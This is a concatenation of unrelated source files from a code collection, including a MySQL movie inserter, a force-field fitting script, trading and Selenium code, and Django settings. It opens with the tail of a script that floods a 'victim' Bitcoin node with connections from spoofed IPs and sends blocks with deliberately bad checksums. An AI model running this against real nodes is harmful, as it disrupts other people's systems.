            print(f'Cleaning up IP alias {ip} on {interface}')
            terminal(f'sudo ifconfig {interface} {ip} down')
        except:
            pass

# This function is run when the script is stopped
def on_close():
    print('Closing open sockets')
    for socket in identity_socket:
        socket.close()
    cleanup_ipaliases()
    cleanup_iptables()
    print('Cleanup complete. 
Goodbye.') #print('Verifying that internet works...') #if not internet_is_active(): # reset_network() # This is the first code to run if __name__ == '__main__': global alias_num alias_num = 0 # Increments each alias initialize_network_info() initialize_bitcoin_info() atexit.register(on_close) # Make on_close() run when the script terminates cleanup_iptables() # Restore any pre-existing iptables before backing up, just in case if the computer shutdown without restoring backup_iptables() # Create the connections for i in range(1, num_identities + 1): try: make_fake_connection(src_ip = random_ip(), dst_ip = victim_ip) except ConnectionRefusedError: print('Connection was refused. The victim\'s node must not be running.') print(f'Successful connections: {len(identity_address)}\n') # Prevent the script from terminating when the sniff function is still active while 1: time.sleep(60)
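Note that `block_packet_bytes` above deliberately substitutes four random bytes for the message checksum (the commented-out lines show the real computation). For reference, a sketch of standard Bitcoin p2p message framing with a valid double-SHA256 checksum, matching the layout the script builds by hand:

```python
import hashlib
import struct

def frame_message(command: str, payload: bytes) -> bytes:
    # Standard Bitcoin mainnet framing: 4-byte magic, 12-byte zero-padded command,
    # 4-byte little-endian payload length, first 4 bytes of double-SHA256(payload).
    header = b'\xf9\xbe\xb4\xd9'
    header += command.encode() + b'\x00' * (12 - len(command))
    header += struct.pack('<I', len(payload))
    header += hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]
    return header + payload

# e.g. frame_message('block', serialized_block_bytes)
```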
34.497006
359
0.743881
0
0
0
0
0
0
0
0
5,543
0.48108
4c5c39c5c86dfe51c79bcbc35385263a0ba508a1
1,638
py
Python
spider/db.py
aloneZERO/douban-movie-visualization
8e59c4d0b00df1b240a5dce09093ae4984fd7118
[ "WTFPL" ]
null
null
null
spider/db.py
aloneZERO/douban-movie-visualization
8e59c4d0b00df1b240a5dce09093ae4984fd7118
[ "WTFPL" ]
null
null
null
spider/db.py
aloneZERO/douban-movie-visualization
8e59c4d0b00df1b240a5dce09093ae4984fd7118
[ "WTFPL" ]
null
null
null
#!python3
'''
Database operations class (数据库操作类)

author: justZero
email: [email protected]
date: 2017-8-6
'''

import time
import pandas as pd
import numpy as np
import pymysql
import pymysql.cursors
import pprint


class MySQLdb(object):

    def __init__(self):
        self.conn = pymysql.connect(
                        host='localhost',
                        user='root',
                        passwd='root',
                        db='douban_movie',
                        port=8889,
                        charset='utf8',
                        cursorclass=pymysql.cursors.DictCursor)
        self.conn.autocommit(True)
        self.cursor = self.conn.cursor()

    def close(self):
        # Close the cursor before the connection that owns it
        self.cursor.close()
        self.conn.close()

    # Batch insert
    def __insert_many(self, sql, params):
        self.cursor.executemany(sql, params)

    # Insert movie records
    def insert_movie(self, params):
        sql = 'insert into movie(movieId,title,url,cover,rate,director,composer,actor,category,district,language,showtime,length,othername,description) '+ \
              'values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)'
        self.__insert_many(sql, params)

    # Insert rating statistics
    def insert_rate(self, params):
        sql = 'insert into rate(name,category,rate) values(%s,%s,%s)'
        self.__insert_many(sql, params)


if __name__ == '__main__':
    inputFile = 'data/douban_movie_clean.txt'
    movies_df = pd.read_csv(inputFile, sep='^')
    movies = np.array(movies_df).tolist()

    db = MySQLdb()
    try:
        db.insert_movie(movies)
    except Exception as e:
        raise e
    finally:
        db.close()
25.2
156
0.566545
1,171
0.696195
0
0
0
0
0
0
484
0.287753
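The spider's __insert_many helper relies on DB-API executemany(), which runs one parameterized statement once per row of parameters. A runnable sketch of the same pattern using the stdlib sqlite3 driver (sqlite3 uses '?' placeholders where pymysql uses '%s'; the table and rows are made up for the demo):

import sqlite3

conn = sqlite3.connect(':memory:')
cur = conn.cursor()
cur.execute('create table rate(name text, category text, rate real)')
rows = [('action', 'genre', 8.1), ('drama', 'genre', 7.9)]
cur.executemany('insert into rate(name,category,rate) values(?,?,?)', rows)
print(cur.execute('select count(*) from rate').fetchone())  # (2,)
cur.close()
conn.close()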
4c5d1777ffd1452788619a58c2a3c09a88985225
2,077
py
Python
examples/rxff-serial/run.py
sctiwari/EZFF_ASE
94710d4cf778ff2db5e6df0cd6d10d92e1b98afe
[ "MIT" ]
3
2019-01-22T21:22:09.000Z
2019-04-02T22:50:40.000Z
examples/rxff-serial/run.py
ElsevierSoftwareX/SOFTX-D-20-00066
b43f8bbb1321d7ed3eeec4f8bb894fe431779433
[ "MIT" ]
14
2019-01-14T18:33:15.000Z
2019-07-08T22:10:11.000Z
examples/rxff-serial/run.py
ElsevierSoftwareX/SOFTX-D-20-00066
b43f8bbb1321d7ed3eeec4f8bb894fe431779433
[ "MIT" ]
3
2019-03-24T23:43:13.000Z
2021-09-12T13:45:08.000Z
import ezff
from ezff.interfaces import gulp, qchem

# Define ground truths
gt_gs = qchem.read_structure('ground_truths/optCHOSx.out')
gt_gs_energy = qchem.read_energy('ground_truths/optCHOSx.out')
gt_scan = qchem.read_structure('ground_truths/scanCHOSx.out')
gt_scan_energy = qchem.read_energy('ground_truths/scanCHOSx.out')

def my_error_function(rr):
    # Get a unique path for GULP jobs from the MPI rank. Set to '0' for serial jobs
    try:
        path = str(pool.rank)
    except:
        path = '0'

    # Calculate Ground State
    md_gs_job = gulp.job(path = path)
    md_gs_job.structure = gt_gs
    md_gs_job.forcefield = ezff.generate_forcefield(template, rr, FFtype = 'reaxff')
    md_gs_job.options['pbc'] = False
    md_gs_job.options['relax_atoms'] = False
    md_gs_job.options['relax_cell'] = False
    # Run GULP calculation
    md_gs_job.run(command='gulp')
    # Read output from completed GULP job and clean-up
    md_gs_energy = md_gs_job.read_energy()
    md_gs_job.cleanup()

    # Calculate PES Scan
    md_scan_job = gulp.job(path = path)
    md_scan_job.structure = gt_scan
    md_scan_job.forcefield = ezff.generate_forcefield(template, rr, FFtype = 'reaxff')
    md_scan_job.options['pbc'] = False
    md_scan_job.options['relax_atoms'] = False
    md_scan_job.options['relax_cell'] = False
    # Run GULP calculation
    md_scan_job.run(command='gulp')
    # Read output from completed GULP job and clean-up
    md_scan_energy = md_scan_job.read_energy()
    md_scan_job.cleanup()

    # Calculate error
    total_error = ezff.error_energy(md_scan_energy - md_gs_energy,
                                    gt_scan_energy - gt_gs_energy, weights = 'uniform')
    return [total_error]

# Read template and variable ranges
bounds = ezff.read_variable_bounds('variable_bounds', verbose=False)
template = ezff.read_forcefield_template('template')

problem = ezff.OptProblem(num_errors = 1, variable_bounds = bounds, error_function = my_error_function, template = template)
algorithm = ezff.Algorithm(problem, 'NSGAII', population = 16)
ezff.optimize(problem, algorithm, iterations = 5)
37.763636
124
0.735676
0
0
0
0
0
0
0
0
590
0.284064
4c5db4db71b2cfe512dcdca6c87e641cb929544e
2,288
py
Python
dev_files/utils.py
dylanwal/unit_parse
07a74d43b9f161bd7ad6ef12ab0f362f1bf6a90d
[ "BSD-3-Clause" ]
1
2022-01-29T17:14:40.000Z
2022-01-29T17:14:40.000Z
dev_files/utils.py
dylanwal/unit_parse
07a74d43b9f161bd7ad6ef12ab0f362f1bf6a90d
[ "BSD-3-Clause" ]
null
null
null
dev_files/utils.py
dylanwal/unit_parse
07a74d43b9f161bd7ad6ef12ab0f362f1bf6a90d
[ "BSD-3-Clause" ]
null
null
null
import logging

from testing_func import testing_func, test_logger
from unit_parse import logger, Unit, Q
from unit_parse.utils import *

test_logger.setLevel(logging.DEBUG)
logger.setLevel(logging.DEBUG)

test_split_list = [
    # positive control (changes)
    [["fish", "pig", "cow"], ["f", "is", "h", "pig", "cow"], {"chunks": ["is"]}],
    [["fish", Unit("g"), "cow"], ["f", "is", "h", Unit("g"), "cow"], {"chunks": ["is"]}],
    [["fishpigcow"], ["f", "i", "shpigcow"], {"chunks": ["i"]}],
    [["fishpigcow"], ["f", "i", "shpig", "c", "ow"], {"chunks": ["i", "c"]}],

    # negative control (no changes)
    [["fish"], ["fish"], {"chunks": ["fish"]}],
    [["fishpigcow"], ["fishpigcow"], {"chunks": ["z"]}],
    [[Unit("g")], [Unit("g")], {"chunks": ["is"]}],
]
testing_func(split_list, test_split_list)

test_round_off = [  # [Input, Output]
    # positive control (works)
    [234.2342300000001, 234.23423, {"sig_digit": 15}],
    [234.2342399999999999, 234.23424, {"sig_digit": 15}],
    [234.2342300000001, 234.23, {"sig_digit": 5}],
    [234.2342399999999999, 234.23, {"sig_digit": 5}],
    [234.2342399999999999, 200, {"sig_digit": 1}],
    [-234.2342399999999999, -200, {"sig_digit": 1}],
    [-234.2342399999999999, -234.23424, {"sig_digit": 15}],

    # negative control (fails)
]
testing_func(sig_figs, test_round_off)

test_list_depth = [  # [Input, Output]
    # positive control (works)
    ["", 0],
    [[], 0],
    ["asds", 0],
    [1, 0],
    [["aaa"], 1],
    [[["aaa"]], 2],
    [[["aaa", "aaa", "aaa"], ["aaa"], ["aaa"]], 2],
    [[["aaa", "aaa", "aaa"], ["aaa"], ["aaa"]], 2],
    [[[["aaa"], ["aaa"], ["aaa"]]], 3],

    # negative control (fails)
]
testing_func(get_list_depth, test_list_depth)

test_remove_empty_cells = [  # [Input, Output]
    # positive control (works)
    [[], None],
    [[""], None],
    [["asds"], ["asds"]],
    [1, 1],
    [["aaa", ""], ["aaa"]],
    [["aaa", []], ["aaa"]],
    [[["aaa", []]], [["aaa"]]],
    [[["aaa", [""]]], [["aaa"]]],

    # negative control (fails)
]
testing_func(remove_empty_cells, test_remove_empty_cells)

examples_quantity_difference = [
    [Q("5 g"), Q("0.5"), {"quantity2": Q("10 g")}],
    [5, 1, {"quantity2": Q("10 g")}],
]
testing_func(quantity_difference, examples_quantity_difference)
27.566265
89
0.542832
0
0
0
0
0
0
0
0
784
0.342657
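The expected outputs in test_round_off imply that sig_figs rounds to a number of significant figures rather than decimal places. A minimal reimplementation sketch that reproduces the table above (illustrative only; not the library's actual code):

import math

def sig_figs_sketch(value, sig_digit=3):
    # Round `value` to `sig_digit` significant figures.
    if value == 0:
        return 0.0
    magnitude = math.floor(math.log10(abs(value)))
    return round(value, sig_digit - 1 - magnitude)

assert sig_figs_sketch(234.2342300000001, sig_digit=5) == 234.23
assert sig_figs_sketch(-234.2342399999999999, sig_digit=1) == -200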
4c5e8dbae6d19592874e45bede3206b69cd9c042
594
py
Python
genlicense.py
d53dave/python-crypto-licensecheck
d11612612ea54a5418fd8dbba9212a9c84c56f22
[ "CNRI-Python", "RSA-MD" ]
null
null
null
genlicense.py
d53dave/python-crypto-licensecheck
d11612612ea54a5418fd8dbba9212a9c84c56f22
[ "CNRI-Python", "RSA-MD" ]
null
null
null
genlicense.py
d53dave/python-crypto-licensecheck
d11612612ea54a5418fd8dbba9212a9c84c56f22
[ "CNRI-Python", "RSA-MD" ]
null
null
null
import sys

from Crypto.Signature import pkcs1_15
from Crypto.Hash import SHA256
from Crypto.PublicKey import RSA


def sign_data(key, data, output_file):
    with open(key, 'r', encoding='utf-8') as keyFile:
        rsakey = RSA.importKey(keyFile.read())
        signer = pkcs1_15.new(rsakey)
        digest = SHA256.new(data.encode('utf-8'))

        with open(output_file, 'wb') as out:
            out.write(signer.sign(digest))


if __name__ == '__main__':
    key_file = sys.argv[1]
    input_string = sys.argv[2]
    out_file = sys.argv[3]

    sign_data(key_file, input_string, out_file)
28.285714
53
0.66835
0
0
0
0
0
0
0
0
31
0.052189
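The script above only signs; verification is the mirror image with the same pycryptodome API. pkcs1_15.verify() raises ValueError when the signature does not match, so the check is a try/except (a throwaway key pair is generated just for this demo):

from Crypto.Signature import pkcs1_15
from Crypto.Hash import SHA256
from Crypto.PublicKey import RSA

key = RSA.generate(2048)  # throwaway key pair for the demo
digest = SHA256.new(b'license payload')
signature = pkcs1_15.new(key).sign(digest)

try:
    pkcs1_15.new(key.publickey()).verify(digest, signature)
    print('signature ok')
except ValueError:
    print('signature invalid')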
4c5f21108bc3014442b8b88f1279054fc89706f5
5,302
py
Python
freqtrade/strategy/informative_decorator.py
Fractate/freqbot
47b35d2320dc97977411454c1466c762d339fdee
[ "MIT" ]
1
2022-03-06T22:44:30.000Z
2022-03-06T22:44:30.000Z
freqtrade/strategy/informative_decorator.py
Fractate/freqbot
47b35d2320dc97977411454c1466c762d339fdee
[ "MIT" ]
null
null
null
freqtrade/strategy/informative_decorator.py
Fractate/freqbot
47b35d2320dc97977411454c1466c762d339fdee
[ "MIT" ]
1
2021-09-22T23:28:21.000Z
2021-09-22T23:28:21.000Z
from typing import Any, Callable, NamedTuple, Optional, Union

from pandas import DataFrame

from freqtrade.exceptions import OperationalException
from freqtrade.strategy.strategy_helper import merge_informative_pair


PopulateIndicators = Callable[[Any, DataFrame, dict], DataFrame]


class InformativeData(NamedTuple):
    asset: Optional[str]
    timeframe: str
    fmt: Union[str, Callable[[Any], str], None]
    ffill: bool


def informative(timeframe: str, asset: str = '',
                fmt: Optional[Union[str, Callable[[Any], str]]] = None,
                ffill: bool = True) -> Callable[[PopulateIndicators], PopulateIndicators]:
    """
    A decorator for populate_indicators_Nn(self, dataframe, metadata), allowing these functions to
    define informative indicators.

    Example usage:

        @informative('1h')
        def populate_indicators_1h(self, dataframe: DataFrame, metadata: dict) -> DataFrame:
            dataframe['rsi'] = ta.RSI(dataframe, timeperiod=14)
            return dataframe

    :param timeframe: Informative timeframe. Must always be equal or higher than strategy timeframe.
    :param asset: Informative asset, for example BTC, BTC/USDT, ETH/BTC. Do not specify to use
        current pair.
    :param fmt: Column format (str) or column formatter (callable(name, asset, timeframe)). When not
        specified, defaults to:
        * {base}_{quote}_{column}_{timeframe} if asset is specified.
        * {column}_{timeframe} if asset is not specified.
        Format string supports these format variables:
        * {asset} - full name of the asset, for example 'BTC/USDT'.
        * {base} - base currency in lower case, for example 'eth'.
        * {BASE} - same as {base}, except in upper case.
        * {quote} - quote currency in lower case, for example 'usdt'.
        * {QUOTE} - same as {quote}, except in upper case.
        * {column} - name of dataframe column.
        * {timeframe} - timeframe of informative dataframe.
    :param ffill: ffill dataframe after merging informative pair.
    """
    _asset = asset
    _timeframe = timeframe
    _fmt = fmt
    _ffill = ffill

    def decorator(fn: PopulateIndicators):
        informative_pairs = getattr(fn, '_ft_informative', [])
        informative_pairs.append(InformativeData(_asset, _timeframe, _fmt, _ffill))
        setattr(fn, '_ft_informative', informative_pairs)
        return fn
    return decorator


def _format_pair_name(config, pair: str) -> str:
    return pair.format(stake_currency=config['stake_currency'],
                       stake=config['stake_currency']).upper()


def _create_and_merge_informative_pair(strategy, dataframe: DataFrame, metadata: dict,
                                       inf_data: InformativeData,
                                       populate_indicators: PopulateIndicators):
    asset = inf_data.asset or ''
    timeframe = inf_data.timeframe
    fmt = inf_data.fmt
    config = strategy.config

    if asset:
        # Insert stake currency if needed.
        asset = _format_pair_name(config, asset)
    else:
        # Not specifying an asset will define informative dataframe for current pair.
        asset = metadata['pair']

    if '/' in asset:
        base, quote = asset.split('/')
    else:
        # When futures are supported this may need reevaluation.
        # base, quote = asset, ''
        raise OperationalException('Not implemented.')

    # Default format. This optimizes for the common case: informative pairs using same stake
    # currency. When quote currency matches stake currency, column name will omit base currency.
    # This allows easily reconfiguring strategy to use different base currency. In a rare case
    # where it is desired to keep quote currency in column name at all times user should specify
    # fmt='{base}_{quote}_{column}_{timeframe}' format or similar.
    if not fmt:
        fmt = '{column}_{timeframe}'            # Informatives of current pair
        if inf_data.asset:
            fmt = '{base}_{quote}_' + fmt       # Informatives of other pairs

    inf_metadata = {'pair': asset, 'timeframe': timeframe}
    inf_dataframe = strategy.dp.get_pair_dataframe(asset, timeframe)
    inf_dataframe = populate_indicators(strategy, inf_dataframe, inf_metadata)

    formatter: Any = None
    if callable(fmt):
        formatter = fmt             # A custom user-specified formatter function.
    else:
        formatter = fmt.format      # A default string formatter.

    fmt_args = {
        'BASE': base.upper(),
        'QUOTE': quote.upper(),
        'base': base.lower(),
        'quote': quote.lower(),
        'asset': asset,
        'timeframe': timeframe,
    }
    inf_dataframe.rename(columns=lambda column: formatter(column=column, **fmt_args),
                         inplace=True)

    date_column = formatter(column='date', **fmt_args)
    if date_column in dataframe.columns:
        raise OperationalException(f'Duplicate column name {date_column} exists in '
                                   f'dataframe! Ensure column names are unique!')
    dataframe = merge_informative_pair(dataframe, inf_dataframe, strategy.timeframe, timeframe,
                                       ffill=inf_data.ffill, append_timeframe=False,
                                       date_column=date_column)
    return dataframe
41.100775
100
0.656733
142
0.026782
0
0
0
0
0
0
2,408
0.454168
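A usage sketch for the decorator above with an explicit asset and format string (an illustrative strategy fragment, not part of this file; it assumes `informative` is importable, e.g. via freqtrade's strategy package, and uses a pure-pandas indicator to stay self-contained). The '{stake}' placeholder in the asset is expanded by _format_pair_name(), and fmt controls the merged column names:

from pandas import DataFrame

class ExampleStrategy:  # would normally subclass freqtrade's IStrategy
    @informative('1d', 'BTC/{stake}', fmt='{base}_{column}_{timeframe}')
    def populate_indicators_btc_1d(self, dataframe: DataFrame, metadata: dict) -> DataFrame:
        # A 20-candle moving average; merged back as column 'btc_sma_1d'.
        dataframe['sma'] = dataframe['close'].rolling(20).mean()
        return dataframe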
4c60db4ddf2f272ea38921358d511b5e55303545
835
py
Python
codigo_das_aulas/aula_09/aula_09_03.py
VeirichR/curso-python-selenium
9b9107a64adb4e6bcf10c76287e0b4cc7d024321
[ "CC0-1.0" ]
234
2020-04-03T02:59:30.000Z
2022-03-27T15:29:21.000Z
codigo_das_aulas/aula_09/aula_09_03.py
VeirichR/curso-python-selenium
9b9107a64adb4e6bcf10c76287e0b4cc7d024321
[ "CC0-1.0" ]
8
2020-04-20T11:20:43.000Z
2021-08-18T16:41:15.000Z
codigo_das_aulas/aula_09/aula_09_03.py
VeirichR/curso-python-selenium
9b9107a64adb4e6bcf10c76287e0b4cc7d024321
[ "CC0-1.0" ]
77
2020-04-03T13:25:19.000Z
2022-02-24T15:31:26.000Z
from functools import partial

from selenium.webdriver import Firefox
from selenium.webdriver.support.ui import (
    WebDriverWait
)


def esperar_elemento(elemento, webdriver):
    # "esperar_elemento" = "wait for element"; True once the selector matches.
    print(f'Tentando encontrar "{elemento}"')  # "Trying to find ..."
    if webdriver.find_elements_by_css_selector(elemento):
        return True
    return False


esperar_botao = partial(esperar_elemento, 'button')       # wait for the button
esperar_sucesso = partial(esperar_elemento, '#finished')  # wait for the success element

url = 'https://selenium.dunossauro.live/aula_09_a.html'

driver = Firefox()

wdw = WebDriverWait(driver, 10)

driver.get(url)

wdw.until(esperar_botao, 'Deu ruim')  # timeout message: "it went wrong"

driver.find_element_by_css_selector('button').click()

wdw.until(
    esperar_sucesso,
    'A mensagem de sucesso não apareceu'  # "the success message did not appear"
)

sucesso = driver.find_element_by_css_selector('#finished')

assert sucesso.text == 'Carregamento concluído'  # page text: "loading finished"
21.973684
58
0.762874
0
0
0
0
0
0
0
0
193
0.230585
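The same wait can be written with Selenium's built-in expected_conditions instead of the hand-rolled partials. A fragment reusing the wdw object from the example above (same WebDriverWait protocol):

from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC

# Equivalent to wdw.until(esperar_botao, ...) via the built-in helper:
wdw.until(EC.presence_of_element_located((By.CSS_SELECTOR, 'button')),
          'Button did not appear')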
4c6108b6c6b2c6296484cdaaf51540f0a9efca44
1,470
py
Python
prae/losses.py
irom-lab/RL_Generalization
82add6898ee2e962a3aa5efedf80821a013eae7f
[ "MIT" ]
24
2020-06-30T11:43:38.000Z
2021-11-15T22:58:47.000Z
prae/losses.py
irom-lab/RL_Generalization
82add6898ee2e962a3aa5efedf80821a013eae7f
[ "MIT" ]
null
null
null
prae/losses.py
irom-lab/RL_Generalization
82add6898ee2e962a3aa5efedf80821a013eae7f
[ "MIT" ]
4
2020-10-15T10:54:18.000Z
2021-05-25T07:38:14.000Z
import torch
from torch import nn

from prae.distances import square_dist, HingedSquaredEuclidean


class Loss(nn.Module):
    """Combined transition / reward / negative-sampling loss."""

    def __init__(self, hinge, neg=True, rew=True):
        super().__init__()
        self.reward_loss = square_dist
        # If False, no negative sampling
        self.neg = neg
        # If False, no reward loss
        self.rew = rew
        self.distance = HingedSquaredEuclidean(eps=hinge)

    def forward(self, z_c, z_l, z_n, z_f, r, r_e):
        # Transition loss
        transition_loss = self.distance.distance(z_n, z_l).mean()

        # Reward loss
        if self.rew:
            reward_loss = 0.5 * self.reward_loss(r, r_e).mean()
        else:
            reward_loss = torch.zeros_like(transition_loss)

        # Negative loss
        if self.neg:
            z_n = tile(z_n, z_f)
            batch_size = z_c.shape[0]
            negative_loss = self.distance.negative_distance(z_n, z_f).sum()/batch_size
        else:
            negative_loss = torch.zeros_like(transition_loss)

        return transition_loss, reward_loss, negative_loss


def tile(embedding, example):
    """Repeat each row of `embedding` so it lines up row-for-row with `example`."""
    n = example.shape[0]//embedding.shape[0]
    embedding = embedding.unsqueeze(1).repeat(1, n, 1)
    embedding = squeeze_embedding(embedding)
    return embedding


def squeeze_embedding(x):
    """Flatten a (b, n, d) tensor to (b*n, d)."""
    b, n, d = x.shape
    x = x.reshape(b*n, d)
    return x
24.098361
86
0.586395
1,050
0.714286
0
0
0
0
0
0
165
0.112245
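A quick shape walk-through of tile() from the file above: with a (2, 3) embedding and a (6, 3) negatives tensor, n = 6 // 2 = 3, so each embedding row is repeated three times before flattening back to (6, 3). A self-contained illustration of those tensor ops:

import torch

emb = torch.arange(6.0).reshape(2, 3)   # rows e0, e1
example = torch.zeros(6, 3)
n = example.shape[0] // emb.shape[0]    # 3
tiled = emb.unsqueeze(1).repeat(1, n, 1).reshape(6, 3)
print(tiled)                            # rows: e0, e0, e0, e1, e1, e1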
4c61ecd42ed59f6a2c7fd49a38719e52edaf2a1f
845
py
Python
orion/modules/active/wolfram.py
isathish/ai_opesource
cdccd882306c45712fcdd40e15937b5a9571028a
[ "MIT" ]
null
null
null
orion/modules/active/wolfram.py
isathish/ai_opesource
cdccd882306c45712fcdd40e15937b5a9571028a
[ "MIT" ]
null
null
null
orion/modules/active/wolfram.py
isathish/ai_opesource
cdccd882306c45712fcdd40e15937b5a9571028a
[ "MIT" ]
null
null
null
""" Handles most general questions (including math!) Requires: - WolframAlpha API key Usage Examples: - "How tall is Mount Everest?" - "What is the derivative of y = 2x?" """ import wolframalpha from orion.classes.module import Module from orion.classes.task import ActiveTask from orion import settings wolfram_client = wolframalpha.Client(settings.WOLFRAM_KEY) class AnswerTask(ActiveTask): def match(self, text): return True def action(self, text): try: query = wolfram_client.query(text) self.speak(next(query.results).text) except: self.speak(settings.NO_MODULES) class Wolfram(Module): def __init__(self): tasks = [AnswerTask()] super(Wolfram, self).__init__('wolfram', tasks, priority=0)
21.666667
68
0.639053
435
0.514793
0
0
0
0
0
0
206
0.243787
4c624ee7a6d344a15a579b043c3cb6fef1c9aa3b
1,035
py
Python
polymatch/matchers/standard.py
linuxdaemon/poly-match
66d967999de982d5ee9463c46b0ff8040d91dc67
[ "MIT" ]
null
null
null
polymatch/matchers/standard.py
linuxdaemon/poly-match
66d967999de982d5ee9463c46b0ff8040d91dc67
[ "MIT" ]
26
2020-05-13T17:46:45.000Z
2022-03-18T16:07:14.000Z
polymatch/matchers/standard.py
TotallyNotRobots/poly-match
66d967999de982d5ee9463c46b0ff8040d91dc67
[ "MIT" ]
null
null
null
from polymatch import PolymorphicMatcher


class ExactMatcher(PolymorphicMatcher):
    def compile_pattern(self, raw_pattern):
        return raw_pattern

    def compile_pattern_cs(self, raw_pattern):
        return raw_pattern

    def compile_pattern_ci(self, raw_pattern):
        return raw_pattern.lower()

    def compile_pattern_cf(self, raw_pattern):
        return raw_pattern.casefold()

    def match_text(self, pattern, text):
        return text == pattern

    @classmethod
    def get_type(cls):
        return "exact"


class ContainsMatcher(PolymorphicMatcher):
    def compile_pattern(self, raw_pattern):
        return raw_pattern

    def compile_pattern_cs(self, raw_pattern):
        return raw_pattern

    def compile_pattern_ci(self, raw_pattern):
        return raw_pattern.lower()

    def compile_pattern_cf(self, raw_pattern):
        return raw_pattern.casefold()

    def match_text(self, pattern, text):
        return pattern in text

    @classmethod
    def get_type(cls):
        return "contains"
23.522727
46
0.696618
988
0.954589
0
0
119
0.114976
0
0
17
0.016425
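The reason the matchers above distinguish lower() (the _ci variants) from casefold() (the _cf variants): casefolding applies the fuller Unicode case-mapping algorithm, which matters for some scripts. A two-line illustration:

s = 'Straße'
print(s.lower())     # 'straße'  -- the 'ß' survives lower()
print(s.casefold())  # 'strasse' -- casefold() lets it match 'STRASSE' case-insensitively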
4c6289a028d756ccd03ac220d11a9d33117ee573
6,530
py
Python
djcorsche/settings_default.py
carthage-college/django-djcorsche
c43db6e634f5b3fc9c8b0cff80ced8382ca6643c
[ "BSD-3-Clause" ]
null
null
null
djcorsche/settings_default.py
carthage-college/django-djcorsche
c43db6e634f5b3fc9c8b0cff80ced8382ca6643c
[ "BSD-3-Clause" ]
null
null
null
djcorsche/settings_default.py
carthage-college/django-djcorsche
c43db6e634f5b3fc9c8b0cff80ced8382ca6643c
[ "BSD-3-Clause" ]
null
null
null
""" Django settings for project. """ # Build paths inside the project like this: os.path.join(BASE_DIR, ...) import os # Debug #DEBUG = False DEBUG = True TEMPLATE_DEBUG = DEBUG INFORMIX_DEBUG = "debug" ADMINS = ( ('', ''), ) MANAGERS = ADMINS SECRET_KEY = '' ALLOWED_HOSTS = [] LANGUAGE_CODE = 'en-us' TIME_ZONE = 'America/Chicago' SITE_ID = 1 USE_I18N = False USE_L10N = False USE_TZ = False DEFAULT_CHARSET = 'utf-8' FILE_CHARSET = 'utf-8' SERVER_URL = "" API_URL = "%s/%s" % (SERVER_URL, "api") LIVEWHALE_API_URL = "https://%s" % (SERVER_URL) BASE_DIR = os.path.dirname(os.path.dirname(__file__)) ROOT_DIR = os.path.dirname(__file__) ROOT_URL = "/djskeletor/" ROOT_URLCONF = 'djskeletor.core.urls' WSGI_APPLICATION = 'djskeletor.wsgi.application' MEDIA_ROOT = '' ADMIN_MEDIA_PREFIX = '/static/admin/' STATIC_ROOT = '' STATIC_URL = "/static/" STATICFILES_DIRS = () STATICFILES_FINDERS = ( 'django.contrib.staticfiles.finders.FileSystemFinder', 'django.contrib.staticfiles.finders.AppDirectoriesFinder', # 'django.contrib.staticfiles.finders.DefaultStorageFinder', ) DATABASES = { 'default': { 'HOST': '127.0.0.1', 'PORT': '3306', 'NAME': 'django_djskeletor', 'ENGINE': 'django.db.backends.mysql', #'ENGINE': 'django.db.backends.dummy', 'USER': '', 'PASSWORD': '' }, } INSTALLED_APPS = ( 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.formtools', 'django.contrib.humanize', 'django.contrib.messages', 'django.contrib.sessions', 'django.contrib.sites', 'django.contrib.staticfiles', 'djskeletor', 'djskeletor.core', 'djskeletor.myapp', 'djtools', ) MIDDLEWARE_CLASSES = ( 'django.middleware.cache.UpdateCacheMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.cache.FetchFromCacheMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', # the following should be uncommented unless you are # embedding your apps in iframes #'django.middleware.clickjacking.XFrameOptionsMiddleware', ) # template stuff TEMPLATE_LOADERS = ( 'django.template.loaders.filesystem.Loader', 'django.template.loaders.app_directories.Loader', ) TEMPLATE_DIRS = ( "/data2/django_projects/djskeletor/templates/", "/data2/django_templates/djkorra/", "/data2/django_templates/djcher/", "/data2/django_templates/", ) TEMPLATE_CONTEXT_PROCESSORS = ( "djtools.context_processors.sitevars", "django.contrib.auth.context_processors.auth", "django.core.context_processors.request", "django.core.context_processors.debug", "django.core.context_processors.media", ) # caching CACHES = { 'default': { 'BACKEND': 'django.core.cache.backends.dummy.DummyCache', #'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache', #'LOCATION': '127.0.0.1:11211', #'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache', #'LOCATION': '/var/tmp/django_djskeletor_cache', #'TIMEOUT': 60*20, #'KEY_PREFIX': "DJSKELETOR_", #'OPTIONS': { # 'MAX_ENTRIES': 80000, #} } } CACHE_MIDDLEWARE_ANONYMOUS_ONLY = True # LDAP Constants LDAP_SERVER = '' LDAP_SERVER_PWM = '' LDAP_PORT = '' LDAP_PORT_PWM = '' LDAP_PROTOCOL = "" LDAP_PROTOCOL_PWM = "" LDAP_BASE = "" LDAP_USER = "" LDAP_PASS = "" LDAP_EMAIL_DOMAIN = "" LDAP_OBJECT_CLASS = "" LDAP_OBJECT_CLASS_LIST = [] LDAP_GROUPS = {} LDAP_RETURN = [] LDAP_RETURN_PWM = [] LDAP_ID_ATTR = "" LDAP_CHALLENGE_ATTR = "" # auth backends AUTHENTICATION_BACKENDS = ( 
